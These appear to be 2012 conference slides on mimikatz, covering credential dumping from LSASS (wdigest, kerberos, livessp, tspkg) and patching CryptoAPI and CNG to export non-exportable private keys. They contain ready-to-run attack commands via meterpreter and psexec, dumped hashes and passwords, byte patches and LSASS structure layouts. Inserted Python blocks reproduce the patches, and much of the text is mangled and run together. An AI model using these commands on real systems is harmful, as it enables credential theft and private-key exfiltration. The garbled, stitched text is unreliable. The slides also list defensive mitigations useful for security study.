meterpreter > execute -H -c -i -m -f /pentest/passwords/mimikatz/mimikatz_x86.exe
mimikatz 1.0 x64 (RC)   /* Traitement du Kiwi (Aug  2 2012 01:32:28) */
// http://blog.gentilkiwi.com/mimikatz

mimikatz # privilege::debug
Request to ACTIVATE privilege : SeDebugPrivilege : OK

mimikatz # sekurlsa::logonPasswords full

Authentication Id         : 0;234870
Authentication package    : NTLM
Primary user              : Gentil Kiwi
Authentication domain     : vm-w8-rp-x

        msv1_0 :
         * User     : Gentil Kiwi
         * Domain   : vm-w8-rp-x
         * LM hash  : d0e9aee149655a6075e4540af1f22d3b
         * NTLM hash: cc36cf7a8514893efccd332446158b1a
        kerberos :
         * User     : Gentil Kiwi
         * Domain   : vm-w8-rp-x
         * Password : waza1234
        wdigest :
         * User     : Gentil Kiwi
         * Domain   : vm-w8-rp-x
         * Password : waza1234
        tspkg :
         * User     : Gentil Kiwi
         * Domain   : vm-w8-rp-x
         * Password : waza1234
        livessp : nt (LUID KO)
mimikatz :: sekurlsa / what we can do
Basics
– No physical access to the computer (first step to pass-the-hash, then pass-the-pass)
– No admin rights / system rights / debug privileges (…)
– Disable local admin accounts
– Strong passwords (haha, it was a joke, so useless ;))
– For privileged accounts, network logon instead of interactive (when possible)
– Audit: pass-the-hash keeps traces and can lock accounts
– No admin rights / system rights / debug privileges, even for VIPs!
– Use a separate network (or forest) for privileged tasks
More in depth
– Force strong authentication (SmartCard & Token) $ €
– Short validity for Kerberos tickets
– No delegation
– Disable NTLM (available with NT6)
– No exotic:
  • biometrics (it keeps the password somewhere and pushes it to Windows)
  • single sign-on
– Stop shared secrets for authentication, push public/private stuff (like keys ;))
– Leave opportunities to stop retro-compatibility
– Disable faulty providers:
  • Is it supported by Microsoft?
  • Even if you can disable LiveSSP, TsPkg and WDigest, will you disable Kerberos and msv1_0?
mimikatz :: crypto / what is it?
A little module that I wrote to:
– play with the Windows Cryptographic API, CNG and RSA keys
– automate export of certificates/keys
  • even those which are "not" exportable
What the crypto module can do:
– List
  • Providers
  • Stores
  • Certificates
  • Keys
– Export
  • Certificates
    – public, in DER format
    – with private keys, in PFX format
  • Private keys in PVK format
    – it's cool, OpenSSL can deal with it too
– Patch
  • CryptoAPI in mimikatz context
  • CNG in LSASS context (again!)
(module: mod_mimikatz_crypto)
mimikatz :: crypto / how it's protected
Private keys are DPAPI protected
– You cannot reuse private key files on another computer
  • at least without the master keys and/or passwords of users
Computer/User can load their own keys because they have enough secrets to do it (ex: session opened)
– Yes, a computer/server opens a "session"
Export/Usage can be limited by:
– Password, Popup (a constraint for most users; unavailable for computer keys)
– Export/Archive flag not present

certutil -importpfx mycert.p12 NoExport
certutil -csp "Microsoft Enhanced Cryptographic Provider v1.0" -importpfx mycert.p12 NoExport
mimikatz :: crypto :: capi / how it works
"Microsoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules. CSPs perform all cryptographic operations and manage private keys. CSPs can be implemented in software as well as in hardware."
– http://technet.microsoft.com/library/cc962093.aspx
Processes (mimikatz, IIS, Active Directory, Internet Explorer, your apps here…) load some DLLs to deal with different cryptographic stuff: CSP (keys), smartcard reader…
– cryptdll.dll, rsaenh.dll, …
Processes deal with cryptographic keys through this API…
mimikatz :: crypto :: capi / how it's exported (PLAYSKOOL level)
[Diagram: Process → CryptoAPI and RSA CSP, loaded in the same process]
  Ask to export key → Load private key (DPAPI decode) → Exportable?
    yes → Exported key
    no  → NTE_BAD_KEY_STATE
mimikatz :: crypto :: patch capi / because I own my process
When we want to export a certificate with its private key (or only the key), it goes into rsaenh!CPExportKey.
This function does all the work to prepare the export, and checks if the key is exportable.

mimikatz # crypto::exportCertificates
Location : 'CERT_SYSTEM_STORE_CURRENT_USER'\My
 - Benjamin Delpy
        Key container : 470ADFBA-8718-4014-B05E-B30776B75A03
        Provider      : Microsoft Enhanced Cryptographic Provider v1.0
        Type          : AT_KEYEXCHANGE
        Exportability : NO
        Key size      : 2048
        Private export to 'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.pfx' : KO (0x8009000b) Key not valid for use in specified state.
        Public export to 'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.der' : OK

Same certificate seen by certutil:
================ Certificate 0 ================
Serial Number: 112169417a1c3ef46a301f99385f50680fa0
Issuer: CN=GlobalSign CodeSigning CA - G2, O=GlobalSign nv-sa, C=BE
Subject: CN=Benjamin Delpy, C=FR
Non-root Certificate
Cert Hash(sha1): ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e
  Key Container = 470ADFBA-8718-4014-B05E-B30776B75A03
  Provider = Microsoft Enhanced Cryptographic Provider v1.0
Private key is NOT exportable
Encryption test passed
CertUtil: -exportPFX command FAILED: 0x8009000b (-2146893813)
CertUtil: Key not valid for use in specified state.
mimikatz :: crypto :: patch capi / because I own my process
So what? A module in my own process returns that I can't do something? CryptoAPI is in my memory space, let's patch it!
I wrote "4" bytes in my memory space:

.text:0AC0B7CB   0F 85 33 C7 FF FF   jnz   continue_key_export_or_archive
   becomes
.text:0AC0B7CB   90                  nop
.text:0AC0B7CC   E9 33 C7 FF FF      jmp   continue_key_export_or_archive

.text:0AC1F749   0F 85 B6 3B FF FF   jnz   continue_key_export_or_archive_prepare
   becomes
.text:0AC1F749   90                  nop
.text:0AC1F74A   E9 B6 3B FF FF      jmp   continue_key_export_or_archive_prepare
mimikatz :: crypto :: patch capi / demo time
Import, export, import as not exportable… export!

mimikatz :: crypto :: patch capi / limitations
Because:
– I'm lazy
– I've seen, in the majority of cases, RSA keys for real-life use
  • Elliptic Curve a little…
mimikatz crypto::patchcapi only deals with:
– Microsoft Base Cryptographic Provider v1.0
– Microsoft Enhanced Cryptographic Provider v1.0
– Microsoft Enhanced RSA and AES Cryptographic Provider
– Microsoft RSA SChannel Cryptographic Provider
– Microsoft Strong Cryptographic Provider
…all based on rsaenh.dll
mimikatz :: crypto :: cng / how it works
"Cryptography API: Next Generation (CNG) is the long-term replacement for the CryptoAPI. CNG is designed to be extensible at many levels and cryptography agnostic in behavior."
– http://msdn.microsoft.com/library/windows/desktop/aa376210.aspx
"To comply with common criteria (CC) requirements, the long-lived keys must be isolated so that they are never present in the application process. CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default."
This time, key operations are not made in the "user" process context:
– the process uses RPC to call "Key isolation service" (keyiso) functions.
It seems more secure than CryptoAPI…
– It is, but it's not perfect…
mimikatz :: crypto :: cng / how it's exported (PLAYSKOOL level)
[Diagram: Process → CNG → RPC → KeyIso service (LSASS process)]
  Ask to export key → (RPC) → Load private key (DPAPI decode) in LSASS → Exportable?
    yes → Exported key, returned over RPC
    no  → NTE_NOT_SUPPORTED
  LSASS on NT6: system protected process, ML_SYSTEM with SYSTEM_MANDATORY_LABEL_NO_WRITE_UP / SYSTEM_MANDATORY_LABEL_NO_READ_UP
mimikatz :: crypto :: patch cng / because sometimes I own LSASS
When we want to export a certificate with its private key (or only the key), the RPC calls lead to lsass(keyiso) → ncrypt!SPCryptExportKey.
This function does all the work to prepare the export, and checks if the key is exportable.

mimikatz # crypto::exportKeys
[user] CNG keys
 - cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
        Exportability : NO
        Key size      : 2048
        Private export to 'cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318.pvk' : KO
        mod_cryptong::getPrivateKey/PrivateKeyBlobToPVK (0x80090029) The requested operation is not supported.
mimikatz :: crypto :: patch cng / because sometimes I own LSASS
This time, checks and keys are in the LSASS process… And what?
I wrote "1" byte in LSASS memory space…

.text:6C815210   75 1C   jnz   short continue_key_export
   becomes
.text:6C815210   EB 1C   jmp   short continue_key_export
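The two patch shapes above (the 6-byte `jnz rel32` in rsaenh!CPExportKey turned into `nop; jmp rel32`, and the 2-byte `jnz rel8` in ncrypt!SPCryptExportKey turned into `jmp rel8`) share one property that is easy to get wrong when reproducing them: the branch target must not move. The following is an added example, not mimikatz code, that builds both patches from the instruction bytes and addresses shown on the slides and verifies the target before and after. The surrounding bytes of each "image" are constructed filler, not real module contents, and the patch is applied to that buffer rather than to a process.

```python
import struct


def branch_target(code, addr):
    """Return (target, length) of the relative jump at code[0], located at virtual address addr.
    Covers the encodings on the slides: jnz rel32 (0F 85), jmp rel32 (E9), jnz rel8 (75),
    jmp rel8 (EB), and a leading nop so a patched 'nop; jmp' pair can be checked as a unit."""
    if code[:1] == b"\x90":
        target, length = branch_target(code[1:], addr + 1)
        return target, length + 1
    if code[:2] == b"\x0f\x85":
        disp, length = struct.unpack_from("<i", code, 2)[0], 6
    elif code[:1] == b"\xe9":
        disp, length = struct.unpack_from("<i", code, 1)[0], 5
    elif code[:1] in (b"\x75", b"\xeb"):
        disp, length = struct.unpack_from("<b", code, 1)[0], 2
    else:
        raise ValueError("no jnz/jmp at %#x" % addr)
    # A relative displacement is measured from the end of the instruction, not its start.
    return (addr + length + disp) & 0xFFFFFFFF, length


def make_unconditional(code):
    """Bytes that turn the jnz at code[0] into an unconditional jump of the same total length."""
    if code[:2] == b"\x0f\x85":
        # 0F 85 disp32 is 6 bytes but E9 disp32 is only 5: the leading nop keeps the end of the
        # instruction at the same address, so the original disp32 can be reused untouched.
        return b"\x90\xe9" + code[2:6]
    if code[:1] == b"\x75":
        return b"\xeb" + code[1:2]          # 75 disp8 -> EB disp8: same size, only the opcode changes
    raise ValueError("not a jnz")


def patch_jnz(image, base, addr):
    """Patch the jnz at addr inside image (a bytearray mapped at base), refusing any patch that
    would move the branch target. Returns (old_target, new_target, patched_bytes)."""
    off = addr - base
    old = bytes(image[off:off + 6])
    old_target, _ = branch_target(old, addr)
    new = make_unconditional(old)
    new_target, new_len = branch_target(new, addr)
    if new_target != old_target or new_len != len(new):
        raise RuntimeError("patch would change the branch target at %#x" % addr)
    image[off:off + len(new)] = new
    return old_target, new_target, new


# Addresses and instruction bytes from the slides; everything around them is constructed.
SITES = {
    "rsaenh!CPExportKey #1": (0x0AC0B7CB, bytes.fromhex("0f8533c7ffff")),
    "rsaenh!CPExportKey #2": (0x0AC1F749, bytes.fromhex("0f85b63bffff")),
    "ncrypt!SPCryptExportKey": (0x6C815210, bytes.fromhex("751c")),
}


def demo():
    """Apply each patch to a constructed page and report the targets before/after plus the bytes."""
    results = {}
    for name, (addr, insn) in SITES.items():
        base = addr & ~0xFFF                      # pretend the page holding the site is mapped
        image = bytearray(b"\xcc" * 0x1000)       # int3 filler, not real module bytes
        image[addr - base:addr - base + len(insn)] = insn
        results[name] = patch_jnz(image, base, addr)
    return results


if __name__ == "__main__":
    for name, (old, new, patched) in demo().items():
        print("%-24s target %#010x -> %#010x  bytes %s" % (name, old, new, patched.hex()))
```

Writing the bytes into a live process is the part the example leaves out on purpose: for CAPI that is a plain write into the caller's own rsaenh mapping, for CNG it is a WriteProcessMemory into LSASS that needs the privileges listed on the limitations slide.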
mimikatz :: crypto :: patch cng / demo time
Import, export, import as not exportable… export again!

mimikatz :: crypto :: patch cng / limitations
The patch operation needs some privileges:
– Admin (debug privilege)
– SYSTEM
mimikatz crypto::patchcng only deals with:
– Microsoft Software Key Storage Provider (maybe other algorithms than RSA)
Not a limitation of mimikatz, but the MMC add-in for certificates cannot export CNG certificates… even those that are exportable (hu?)
– certutil can…

mimikatz :: crypto :: patch cng / bonus
After one admin has patched LSASS, all users of the current system benefit from the extra exports
– until reboot / KeyIso service restart
Some other programs that don't check the export flag before asking for the export can work too
– Yeah, like the good old certutil!
Before the patch:
C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx
MY
================ Certificate 1 ================
[…]
Cert Hash(sha1): dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
  Key Container = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
  Provider = Microsoft Software Key Storage Provider
Private key is NOT exportable
Encryption test passed
CertUtil: -exportPFX command FAILED: 0x8009000b (-2146893813)
CertUtil: Key not valid for use in specified state.

After the patch:
C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx
MY
================ Certificate 1 ================
[…]
Cert Hash(sha1): dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
  Key Container = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
  Provider = Microsoft Software Key Storage Provider
Encryption test passed
CertUtil: -exportPFX command completed successfully.
mimikatz :: crypto / memo
Some commands:
mimikatz "crypto::patchcapi" "crypto::exportCertificates" exit
psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe "crypto::patchcapi" "crypto::patchcng" "crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE" "crypto::exportKeys computer" exit
mimikatz "crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop"
mimikatz "privilege::debug" "crypto::patchcng" "crypto::patchcapi" "crypto::exportCertificates" "crypto::exportKeys" exit
Password
– PFX files are protected by this password: mimikatz
Keys
– When you import a certificate multiple times (exportable or not), Windows makes duplicate keys
– When you delete a certificate, Windows does not delete its private key… funny, isn't it?
  • So yes, mimikatz can export it
mimikatz :: crypto / what we can do
Exactly the same as for sekurlsa: it will prevent access to accounts/computers
– no admin, no admin, no admin…
Basics
– Use smartcards/tokens for users' certificates
– Use Hardware Security Modules (HSM), even SoftHSM
More in depth
– See what Microsoft can do with the TPM from Windows 8
  • Virtual SmartCard seems promising
– Verify vendors' implementations (Lenovo, Dell, …) of TPM CSP/KSP
  • Their biometrics stuff was a little buggy ;)
mimikatz / what else can it do?
– Play with minesweeper
– Manipulate some handles
– Pass the hash
– Dump SAM / AD
– Stop event monitoring
– Patch Terminal Server
– Basic GPO bypass
– Applocker / SRP bypass
– Driver
  • Play with tokens & privileges
  • Display SSDT x86 & x64
  • List minifilters actions
  • List Notifications (process, thread, image, registry)
  • List Objects hooks and procedures
  • …
– …
mimikatz / that's all folks!
Thanks to / Merci à
– my girlfriend for her support (her LSASS crashed a few times)
– Application Security Forum for offering me this great opportunity
  • Partners and Sponsors for sure
– Microsoft, to always consider it as normal/acceptable
– Security friends/community for their ideas & challenges
  • nagual, newsoft, mubix, …
– You, for your attention
Questions?
Don't be shy ;)
especially if you have written the corresponding slide number
Blog, Source Code & Contact
blog     : http://blog.gentilkiwi.com
mimikatz : http://blog.gentilkiwi.com/mimikatz
source   : https://code.google.com/p/mimikatz
email    : benjamin@gentilkiwi.com
mimikatz :: sekurlsa :: wdigest / what is it?
We speak about hashes, but what hashes?
H = MD5(HA1:nonce:[…]:HA2)
• HA1 = MD5(username:realm:password)
• HA2 = MD5(method:digestURI[…])
Even after login, HA1 may change… the realm is from the server side and cannot be determined before Windows logon.
The WDigest provider must have the elements to compute responses for different servers:
– Username
– Realm (from server)
– Password
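The computation the slide sketches, written out as an added example (not from the slides or from mimikatz) so the dependency it describes is visible: HA1 takes the realm, the realm comes from the server's challenge, so a client that kept only HA1 for one realm could not answer a server in another realm. The sample values are the published RFC 2617 example (section 3.5); the second realm name is constructed.

```python
import hashlib


def _h(*parts):
    """H(data) of RFC 2617: hex MD5 of the colon-joined fields."""
    return hashlib.md5(":".join(parts).encode("utf-8")).hexdigest()


def ha1(username, realm, password):
    """HA1 = MD5(username:realm:password). The realm is chosen by the server, so this cannot be
    computed once at Windows logon; WDigest has to keep the password to redo it per server."""
    return _h(username, realm, password)


def ha2(method, digest_uri):
    """HA2 = MD5(method:digestURI) for qop=auth (qop=auth-int would also hash the entity body)."""
    return _h(method, digest_uri)


def digest_response(username, realm, password, method, uri, nonce, nc, cnonce, qop="auth"):
    """response = MD5(HA1:nonce:nc:cnonce:qop:HA2), the value placed in the Authorization header."""
    return _h(ha1(username, realm, password), nonce, nc, cnonce, qop, ha2(method, uri))


def responses_from_cached_ha1(cached_ha1, cached_realm, challenges):
    """What a client could answer if it had kept only HA1 for one realm instead of the password.
    challenges is a list of (realm, method, uri, nonce, nc, cnonce); None marks an unanswerable one."""
    answers = {}
    for realm, method, uri, nonce, nc, cnonce in challenges:
        if realm != cached_realm:
            answers[realm] = None          # HA1 for this realm would need the password again
        else:
            answers[realm] = _h(cached_ha1, nonce, nc, cnonce, "auth", ha2(method, uri))
    return answers


# RFC 2617 section 3.5 example values (published test vector).
RFC2617_EXAMPLE = dict(username="Mufasa", realm="testrealm@host.com", password="Circle Of Life",
                       method="GET", uri="/dir/index.html",
                       nonce="dcd98b7102dd2f0e8b11d0f600bfb0c093", nc="00000001", cnonce="0a4f113b")


def walkthrough():
    """Full response with the password, then the same client holding only HA1 and facing two
    challenges: one from the cached realm, one from a constructed second realm."""
    ex = RFC2617_EXAMPLE
    full = digest_response(**ex)
    challenge = (ex["method"], ex["uri"], ex["nonce"], ex["nc"], ex["cnonce"])
    cached = responses_from_cached_ha1(ha1(ex["username"], ex["realm"], ex["password"]), ex["realm"],
                                       [(ex["realm"],) + challenge, ("files@other.example",) + challenge])
    return full, cached


if __name__ == "__main__":
    print(walkthrough())
```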
mimikatz :: sekurlsa :: wdigest / theory
This time we know:
– that WDigest keeps the password in memory « by protocol » for the HA1 digest
– that LSASS loves to unprotect passwords with LsaUnprotectMemory (so protects them with LsaProtectMemory)
LsaUnprotectMemory
– At offset 0xb4 of LSA_SECPKG_FUNCTION_TABLE
– Let's perform a search in WDigest
– Hypothesis seems verified!
LsaProtectMemory
– At offset 0xb0 of LSA_SECPKG_FUNCTION_TABLE
– Let's perform a search in WDigest
– SpAcceptCredentials takes the clear password in its arguments
  • protects it with LsaProtectMemory
  • updates or inserts data in the double linked list wdigest!l_LogSessList

.text:7409D151   _DigestCalcHA1@8        call dword ptr [eax+0B4h]
.text:74096C69   _SpAcceptCredentials@16 call dword ptr [eax+0B0h]
mimikatz :: sekurlsa :: wdigest / workflow
LsaEnumerateLogonSessions
  for each LUID:
    wdigest!l_LogSessList: search the linked list for the LUID
    → KIWI_WDIGEST_LIST_ENTRY
    → LsaUnprotectMemory(Password) → password in clear

typedef struct _KIWI_WDIGEST_LIST_ENTRY {
    struct _KIWI_WDIGEST_LIST_ENTRY *Flink;
    struct _KIWI_WDIGEST_LIST_ENTRY *Blink;
    DWORD UsageCount;
    struct _KIWI_WDIGEST_LIST_ENTRY *This;
    LUID LocallyUniqueIdentifier;
    [...]
    LSA_UNICODE_STRING UserName;
    LSA_UNICODE_STRING Domaine;
    LSA_UNICODE_STRING Password;
    [...]
} KIWI_WDIGEST_LIST_ENTRY, *PKIWI_WDIGEST_LIST_ENTRY;
mimikatz :: sekurlsa :: wdigest / demo time
sekurlsa::wdigest

mimikatz :: sekurlsa :: livessp
because Microsoft was too good in closed networks
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 22
mimikatz sekurlsa livessphow
Actually Irsquove only used logical (empirical) approach to search passwordshellip ndash Protocol reading
ndash Symbols searching
~ Boring ~hellip be more brutal this time make a WinDBG trap
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 23
0 kdgt process 0 0 lsassexePROCESS 83569040 SessionId 0 Cid 0224 Peb 7f43f000 ParentCid 01b4
DirBase 5df58100 ObjectTable 80ce4740 HandleCount ltData Not AccessiblegtImage lsassexe
0 kdgt process i 83569040You need to continue execution (press g ltentergt) for the contextto be switched When the debugger breaks in again you will be inthe new process context0 kdgt gBreak instruction exception - code 80000003 (first chance)ntRtlpBreakWithStatusInstruction814b39d0 cc int 30 kdgt reload userLoading User Symbols0 kdgt bp p $proc lsasrvLsaProtectMemory kc 5 g0 kdgt g
mimikatz sekurlsa livessphow
Letrsquos login with a Live account on Windows 8
After credentials protection LsaApLogonUserEx2 calls LiveCreateLogonSession to insert data in LiveGlobalLogonSessionList (similar to WDigest)
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 24
lsasrvLsaProtectMemorylivesspLiveMakeSupplementalCredlivesspLiveMakeSecPkgCredentialslivesspLsaApLogonUserEx2livesspSpiLogonUserEx2
lsasrvLsaProtectMemorymsv1_0NlpAddPrimaryCredentialmsv1_0SspAcceptCredentialsmsv1_0SpAcceptCredentials
lsasrvLsaProtectMemorytspkgTSHidePasswordtspkgSpAcceptCredentials
1 kdgt uf c livesspLsaApLogonUserEx2livesspLsaApLogonUserEx2 (74781536)[]livesspLsaApLogonUserEx2+0x560 (74781a96)call to livesspLiveCreateLogonSession (74784867)
Our LiveSSP provider
Yeah Pass the Hash capability with Live account toohellip
Live user can logon through RDP via SSO
mimikatz sekurlsa livesspworkflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 25
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
password in clear
typedef struct _KIWI_LIVESSP_LIST_ENTRY struct _KIWI_LIVESSP_LIST_ENTRY Flinkstruct _KIWI_LIVESSP_LIST_ENTRY BlinkPVOID unk0PVOID unk1PVOID unk2PVOID unk3DWORD unk4DWORD unk5PVOID unk6LUID LocallyUniqueIdentifierLSA_UNICODE_STRING UserNamePVOID unk7PKIWI_LIVESSP_PRIMARY_CREDENTIAL suppCreds
KIWI_LIVESSP_LIST_ENTRY PKIWI_LIVESSP_LIST_ENTRY
livesspLiveGlobalLogonSessionList
search linked list for LUID
KIWI_LIVESSP_LIST_ENTRYKIWI_LIVESSP_PRIMARY_CREDENTIAL
typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL DWORD isSuppDWORD unk0LSA_UNICODE_STRING UserNameLSA_UNICODE_STRING DomaineLSA_UNICODE_STRING Password
KIWI_LIVESSP_PRIMARY_CREDENTIAL PKIWI_LIVESSP_PRIMARY_CREDENTIAL
mimikatz sekurlsa
Even if we already have tools for normal accounts are you not curious to test one with this trap
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 26
Me yes
mimikatz sekurlsa kerberos
Letrsquos login normal account
After credentials protection KerbCreateLogonSession calls ndash NT6 KerbInsertOrLocateLogonSession to insert data in
KerbGlobalLogonSessionTable
ndash NT5 KerbInsertLogonSession to insert data in KerbLogonSessionList
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 27
lsasrvLsaProtectMemorykerberosKerbHideKeykerberosKerbCreatePrimaryCredentialskerberosKerbCreateLogonSessionkerberosSpAcceptCredentials
lsasrvLsaProtectMemorykerberosKerbHidePasswordkerberosKerbCreateLogonSessionkerberosSpAcceptCredentials
lsasrvLsaProtectMemorymsv1_0NlpAddPrimaryCredentialmsv1_0SspAcceptCredentialsmsv1_0SpAcceptCredentials
lsasrvLsaProtectMemorywdigestSpAcceptCredentials
lsasrvLsaProtectMemorytspkgTSHidePasswordtspkgSpAcceptCredentials
Kerberos part for password
Kerberos ticket part Maybe )
mimikatz sekurlsa kerberos (nt6)workflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 28
RtlLookupElementGenericTableAvl
LsaUnprotectMemory
KIWI_KERBEROS_PRIMARY_CREDENTIAL
typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL
DWORD unk0PVOID unk1PVOID unk2PVOID unk3
ifdef _M_X64BYTE unk4[32]
elif defined _M_IX86BYTE unk4[20]
endifLUID LocallyUniqueIdentifier
ifdef _M_X64BYTE unk5[44]
elif defined _M_IX86BYTE unk5[36]
endifLSA_UNICODE_STRING UserNameLSA_UNICODE_STRING DomaineLSA_UNICODE_STRING Password
KIWI_KERBEROS_PRIMARY_CREDENTIAL PKIWI_KERBEROS_PRIMARY_CREDENTIAL
LsaEnumerateLogonSessions
for each LUID
password in clear
KIWI_KERBEROS_PRIMARY_CREDENTIAL
KerberosKerbGlobalLogonSessionTable
mimikatz sekurlsa kerberos (nt5)workflow
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 29
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
password in clear
typedef struct _KIWI_KERBEROS_LOGON_SESSION struct _KIWI_KERBEROS_LOGON_SESSION Flinkstruct _KIWI_KERBEROS_LOGON_SESSION Blink DWORD UsageCountPVOID unk0PVOID unk1PVOID unk2DWORD unk3DWORD unk4PVOID unk5PVOID unk6PVOID unk7LUID LocallyUniqueIdentifier
ifdef _M_IX86DWORD unk8
endifDWORD unk9DWORD unk10PVOID unk11DWORD unk12DWORD unk13PVOID unk14PVOID unk15PVOID unk16[hellip]LSA_UNICODE_STRING UserNameLSA_UNICODE_STRING DomaineLSA_UNICODE_STRING Password
KIWI_KERBEROS_LOGON_SESSION PKIWI_KERBEROS_LOGON_SESSION
kerberosKerbLogonSessionList
search linked list for LUID
KIWI_LIVESSP_PRIMARY_CREDENTIAL
mimikatz sekurlsademo time
Final sekurlsa demo sekurlsalogonPasswords full
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 30
mimikatz sekurlsa kerberosldquohu rdquo
Ok It workshellip
But why
Not at all logon on NT5 (can need an unlock)
From my understanding of Microsoft explanations
ndash no need of passwords for the Kerberos protocolhellip
ndash all is based on the hash (not very sexy too)
Microsoftrsquos implementation of Kerberos is full of logicalhellip
ndash For password auth
bull password hash for shared secret but keeping password in memory
ndash For full smartcard auth
bull No password on client
bull No hash on client
ndash NTLM hash on clienthellip
ndash KDC sent it back as a gift
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 31
mimikatz sekurlsa
All passwords in memory are encrypted but in a reversible way to be used
We used LsaUnprotecMemory in the LSASS context to decrypt them
ndash This function rely on LsaEncryptMemory from lsasrvdll
For that we previously inject a DLL (sekurlsadll) in the LSASS process to take benefits of its keys when we called it
Can it be fun to decrypt outside the process ndash Yes it ishellip no more injection just reading memory of LSASS processhellip
mimikatz can use lsasrvdll too and ldquoimportsrdquo LSASS initialized keys ndash When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS we have
the same comportments than when we are in LSASS
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 32
LsaUnprotectMemory
mimikatz sekurlsaLsaEncryptMemory NT5
Depending on the size of the secret LsaEncryptMemory use
ndash RC4
ndash DESx
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 33
g_pRandomKey
g_cbRandomKey
BYTE[g_cbRandomKey]
DWORD 256
BYTE[g_cbRandomKey]
g_pDESXKeyBYTE[144]
BYTE[144]
g_Feedback BYTE[8]
lsass
lsasrv
lsass
lsasrv
mimikatz
lsasrv
copyhellip
mimikatz sekurlsaLsaEncryptMemory NT6
Depending on the size of the secret LsaEncryptMemory use
ndash 3DES
ndash AES
07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 34
InitializationVector BYTE[16]
lsass
lsasrv
lsass
lsasrv
mimikatz
copyhellip
h3DesKey
typedef struct _KIWI_BCRYPT_KEY_DATA DWORD sizeDWORD tagDWORD typeDWORD unk0DWORD unk1DWORD unk2DWORD unk3PVOID unk4BYTE data etc
KIWI_BCRYPT_KEY_DATA PKIWI_BCRYPT_KEY_DATA
hAesKey
lsasrv typedef struct _KIWI_BCRYPT_KEY
DWORD sizeDWORD typePVOID unk0PKIWI_BCRYPT_KEY_DATA clePVOID unk1
KIWI_BCRYPT_KEY PKIWI_BCRYPT_KEY
mimikatz / sekurlsa / memo

Security Packages
Package          Symbols                                                  Type
tspkg            tspkg!TSGlobalCredTable                                  RTL_AVL_TABLE
wdigest          wdigest!l_LogSessList                                    LIST_ENTRY
livessp          livessp!LiveGlobalLogonSessionList                       LIST_ENTRY
kerberos (nt5)   kerberos!KerbLogonSessionList                            LIST_ENTRY
kerberos (nt6)   kerberos!KerbGlobalLogonSessionTable                     RTL_AVL_TABLE
msv1_0           lsasrv!LogonSessionList / lsasrv!LogonSessionListCount   LIST_ENTRY / ULONG

Protection Keys
Key    NT 5 Symbols                                NT 6 Symbols
       (none)                                      lsasrv!InitializationVector
RC4    lsasrv!g_cbRandomKey / lsasrv!g_pRandomKey
DESx   lsasrv!g_pDESXKey / lsasrv!g_Feedback
3DES                                               lsasrv!h3DesKey
AES                                                lsasrv!hAesKey
mimikatz / sekurlsa / memo
Some commands:
  mimikatz privilege::debug sekurlsa::logonPasswords full exit
  psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe sekurlsa::logonPasswords full exit
  meterpreter > execute -H -c -i -m -f /pentest/passwords/mimikatz/mimikatz_x86.exe

mimikatz 1.0 x64 (RC) /* Traitement du Kiwi (Aug 2 2012 01:32:28) */ // http://blog.gentilkiwi.com/mimikatz

mimikatz # privilege::debug
Demande d'ACTIVATION du privilège : SeDebugPrivilege : OK

mimikatz # sekurlsa::logonPasswords full

Authentification Id        : 0;234870
Package d'authentification : NTLM
Utilisateur principal      : Gentil Kiwi
Domaine d'authentification : vm-w8-rp-x
	msv1_0 :
	 * Utilisateur  : Gentil Kiwi
	 * Domaine      : vm-w8-rp-x
	 * Hash LM      : d0e9aee149655a6075e4540af1f22d3b
	 * Hash NTLM    : cc36cf7a8514893efccd332446158b1a
	kerberos :
	 * Utilisateur  : Gentil Kiwi
	 * Domaine      : vm-w8-rp-x
	 * Mot de passe : waza1234
	wdigest :
	 * Utilisateur  : Gentil Kiwi
